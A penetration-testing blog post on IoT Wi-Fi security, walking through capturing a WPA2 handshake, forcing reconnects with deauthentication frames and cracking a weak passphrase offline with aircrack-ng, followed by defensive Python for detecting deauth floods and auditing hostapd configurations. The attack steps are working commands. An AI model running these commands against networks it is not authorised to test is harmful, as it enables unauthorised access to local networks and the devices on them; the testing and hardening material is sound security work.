Berkner Tech

Wi-Fi Security Testing for IoT Devices

IoT Wi-Fi security testing pipeline, from monitor mode to an offline WPA2 passphrase crack

Wi-Fi is how most consumer IoT reaches the internet, and it inherits every Wi-Fi weakness plus a few of its own. A device that supports WPS, ships a weak default passphrase, or skips protected management frames hands an attacker a foothold on the local network. Here is how I test it.

Why the Local Network Matters

Once an attacker is on the same Wi-Fi as an IoT device, every weak local service is in reach: the plaintext MQTT broker, the unauthenticated web UI, the debug port left listening on the network. Cracking the Wi-Fi is often the first step that makes all the others possible.

Step 1: Capture the Handshake

Put the adapter in monitor mode, find the target network, and capture the four-way handshake when a client connects:

sudo airmon-ng start wlan0
sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w cap wlan0mon
Example output:
BSSID              PWR  CH  ENC  CIPHER AUTH ESSID
AA:BB:CC:11:22:33  -42   6  WPA2 CCMP   PSK  IoT-Cam-Net

[ WPA handshake: AA:BB:CC:11:22:33 ]

Step 2: Force a Reconnect

If no client connects on its own, a deauthentication frame knocks one off so that it reconnects and completes the handshake while the capture is running:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:11:22:33 wlan0mon
Example output:
Sending 64 directed DeAuth (code 7). STMAC: [5C:F8:21:0A:3B:7E]
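
From the defending side, the burst in Step 2 is loud and easy to spot. The following Python is an example added to this post (it is not part of the original article or of the aircrack-ng suite): it parses raw 802.11 management frames from a monitor-mode capture and flags a BSSID that sees ten or more unprotected deauthentication or disassociation frames inside one second. The frames, timestamps and the sample capture are constructed for the example (the AP and client addresses mirror the ones in the output above); build_mgmt_frame, parse_mgmt_frame and detect_deauth_flood are helper names chosen here, not standard APIs.

```python
import struct
from collections import defaultdict, deque

# 802.11 management subtypes (frame type 0) that tear down an association
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

# A few IEEE 802.11 reason codes; code 7 is the one the aireplay-ng output above shows
REASON_CODES = {
    1: "unspecified reason",
    2: "previous authentication no longer valid",
    3: "deauthenticated because sending STA is leaving",
    6: "class 2 frame received from nonauthenticated STA",
    7: "class 3 frame received from nonassociated STA",
}

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(b):
    return ":".join(f"{x:02X}" for x in b)

def build_mgmt_frame(subtype, receiver, transmitter, bssid, body=b"", protected=False):
    """Constructed 802.11 management frame (example helper, not a real capture)."""
    fc0 = subtype << 4              # protocol version 0, type 0 (management), subtype in high nibble
    fc1 = 0x40 if protected else 0  # bit 6 of the flags byte is the Protected Frame bit
    header = (struct.pack("<BBH", fc0, fc1, 0)  # frame control + duration
              + mac_bytes(receiver) + mac_bytes(transmitter) + mac_bytes(bssid)
              + struct.pack("<H", 0))           # sequence control
    return header + body

def parse_mgmt_frame(frame):
    """Parse the fixed MAC header of an 802.11 management frame; None for anything else."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x03) != 0 or ((fc0 >> 2) & 0x03) != 0:  # version 0, type 0 only
        return None
    subtype = (fc0 >> 4) & 0x0F
    protected = bool(fc1 & 0x40)
    body = frame[24:]
    reason = None
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and not protected and len(body) >= 2:
        reason = struct.unpack("<H", body[:2])[0]  # reason code: first body field, little-endian
    return {
        "subtype": subtype,
        "receiver": mac_str(frame[4:10]),
        "transmitter": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "protected": protected,
        "reason": reason,
    }

def detect_deauth_flood(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, raw_frame). Returns one alert per BSSID that
    sees `threshold` or more unprotected deauth/disassoc frames within `window` seconds."""
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for ts, raw in capture:
        info = parse_mgmt_frame(raw)
        if info is None or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        # Under PMF (802.11w) the client checks a MIC on these frames, so only the
        # unprotected ones are spoofable; those are the ones worth counting.
        if info["protected"]:
            continue
        q = recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and info["bssid"] not in alerted:
            alerted.add(info["bssid"])
            alerts.append({
                "bssid": info["bssid"],
                "transmitter": info["transmitter"],
                "target": info["receiver"],
                "count": len(q),
                "first_seen": q[0],
                "last_seen": ts,
                "reason": REASON_CODES.get(info["reason"], f"code {info['reason']}"),
            })
    return alerts

AP = "AA:BB:CC:11:22:33"       # BSSID from the capture above
CLIENT = "5C:F8:21:0A:3B:7E"   # STMAC from the aireplay-ng output above

def sample_capture():
    """Constructed monitor-mode capture: a beacon, one genuine client deauth, a 64-frame
    spoofed burst 20 ms apart with reason code 7, and one PMF-protected deauth."""
    frames = [
        (0.000, build_mgmt_frame(8, "FF:FF:FF:FF:FF:FF", AP, AP)),                       # beacon
        (0.100, build_mgmt_frame(SUBTYPE_DEAUTH, AP, CLIENT, AP, struct.pack("<H", 3))),  # client leaving
    ]
    for i in range(64):
        frames.append((5.0 + i * 0.02,
                       build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))))
    frames.append((10.0, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, b"\x00" * 16, protected=True)))
    return frames

if __name__ == "__main__":
    for a in detect_deauth_flood(sample_capture()):
        print(f"deauth flood on {a['bssid']} -> {a['target']}: {a['count']} frames in "
              f"{a['last_seen'] - a['first_seen']:.2f}s ({a['reason']})")
```

In a real deployment the frames would come from a pcap reader or a monitor-mode socket rather than sample_capture(). The single reason-3 deauth at the start is ignored because it never reaches the threshold inside the window, and the protected frame at the end is skipped on the Protected Frame bit, which is exactly the property PMF gives you: once the client requires protected management frames, the unprotected burst this detector counts is also the burst the client discards.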

Step 3: Crack It Offline

With the handshake captured, the rest is an offline dictionary attack. No lockout, no rate limit, no alert on the device:

[Figure: anatomy of an aircrack-ng WPA2 handshake crack command with a wordlist]
aircrack-ng -w wordlist.txt cap-01.cap
Example output:
                 Aircrack-ng 1.7
      [00:00:14] 9216 keys tested (612 k/s)

                 KEY FOUND! [ admin1234 ]

A default passphrase like admin1234 falls in seconds. One weak default hands over the whole local network and every device on it.

Three IoT Wi-Fi Weaknesses

The recurring offenders on connected products:

[Figure: three IoT Wi-Fi security weaknesses: WPS PIN, weak PSK, and no protected management frames]

Defending an IoT Wi-Fi Product

Disable WPS, require a unique strong passphrase per unit rather than a shared default, and support WPA3 with protected management frames. Just as importantly, do not assume the local network is a trust boundary: authenticate device services even to clients already on the Wi-Fi.
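
To make that checklist concrete, here is an added example (mine, not content from the original post and not hostapd project code) that audits a hostapd configuration against the three weaknesses above and shows a weak configuration beside a hardened one. Both hostapd.conf snippets are constructed; the 64-bit entropy floor, the small denylist of shipped defaults and the 20-character per-unit passphrase are my choices, and audit_hostapd_conf and provision_passphrase are helper names chosen here.

```python
import math
import re
import secrets
import string

# Constructed denylist of shipped defaults; a production list would be far longer.
COMMON_DEFAULTS = {"admin1234", "password", "12345678", "admin", "iot12345", "qwertyui"}
MIN_PASSPHRASE_BITS = 64

# Constructed hostapd.conf for a camera shipped with a shared default passphrase, WPS on and no PMF.
WEAK_HOSTAPD_CONF = """\
interface=wlan0
ssid=IoT-Cam-Net
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=admin1234
rsn_pairwise=CCMP TKIP
wps_state=2
ieee80211w=0
"""

def provision_passphrase(length=20):
    """Unique per-unit passphrase generated at provisioning time from the OS CSPRNG
    (20 characters over 62 symbols is about 119 bits)."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

def hardened_hostapd_conf(passphrase):
    """Same AP with WPS off, PMF required and WPA3-SAE instead of a crackable PSK handshake."""
    return f"""\
interface=wlan0
ssid=IoT-Cam-Net
wpa=2
wpa_key_mgmt=SAE
sae_password={passphrase}
rsn_pairwise=CCMP
wps_state=0
ieee80211w=2
"""

def passphrase_entropy_bits(pw):
    """Upper-bound estimate: length times log2 of the character classes actually used."""
    alphabet = 0
    if re.search(r"[a-z]", pw):
        alphabet += 26
    if re.search(r"[A-Z]", pw):
        alphabet += 26
    if re.search(r"[0-9]", pw):
        alphabet += 10
    if re.search(r"[^A-Za-z0-9]", pw):
        alphabet += 33
    return len(pw) * math.log2(alphabet) if alphabet else 0.0

def parse_hostapd_conf(text):
    """Minimal key=value parser; comments and blank lines are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd_conf(text):
    """Return (finding_id, message) pairs for the weaknesses the post lists; empty means clean."""
    c = parse_hostapd_conf(text)
    findings = []
    if c.get("wpa") != "2":
        findings.append(("NOT_RSN", f"wpa={c.get('wpa', '0')}: enable WPA2/RSN only (wpa=2)"))
    if c.get("wps_state", "0") != "0":
        findings.append(("WPS_ENABLED", f"wps_state={c['wps_state']}: disable WPS (wps_state=0); the PIN method is brute-forceable"))
    if c.get("ieee80211w", "0") != "2":
        findings.append(("PMF_NOT_REQUIRED", f"ieee80211w={c.get('ieee80211w', '0')}: require PMF (ieee80211w=2) so deauth/disassoc frames cannot be spoofed"))
    key_mgmt = c.get("wpa_key_mgmt", "").split()
    if "SAE" not in key_mgmt:
        findings.append(("NO_SAE", f"wpa_key_mgmt={' '.join(key_mgmt) or '(unset)'}: the PSK handshake can be captured and cracked offline; offer WPA3-SAE"))
    if "TKIP" in c.get("rsn_pairwise", "").split():
        findings.append(("TKIP_ALLOWED", "rsn_pairwise allows TKIP; use CCMP only"))
    for key in ("wpa_passphrase", "sae_password"):
        pw = c.get(key)
        if pw is None:
            continue
        bits = passphrase_entropy_bits(pw)
        if pw.lower() in COMMON_DEFAULTS or bits < MIN_PASSPHRASE_BITS:
            findings.append(("WEAK_PASSPHRASE", f"{key} is a known default or only ~{bits:.0f} bits; provision a unique random passphrase per unit"))
    return findings

if __name__ == "__main__":
    for fid, msg in audit_hostapd_conf(WEAK_HOSTAPD_CONF):
        print(f"[{fid}] {msg}")
    print("hardened:", audit_hostapd_conf(hardened_hostapd_conf(provision_passphrase())) or "no findings")
```

The weak configuration trips every check; the hardened one passes. Two design points: the passphrase is generated per unit at provisioning rather than baked into firmware, so cracking one device's passphrase yields nothing about the next, and SAE is required rather than offered in transition mode, because a network that still accepts the PSK handshake still hands out the offline-crackable material Step 3 relies on.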

Where This Fits

Wi-Fi testing and the local-network exposure it unlocks are a standard part of a connected-product penetration test. That assessment is the kind of work we do at Berkner Tech.
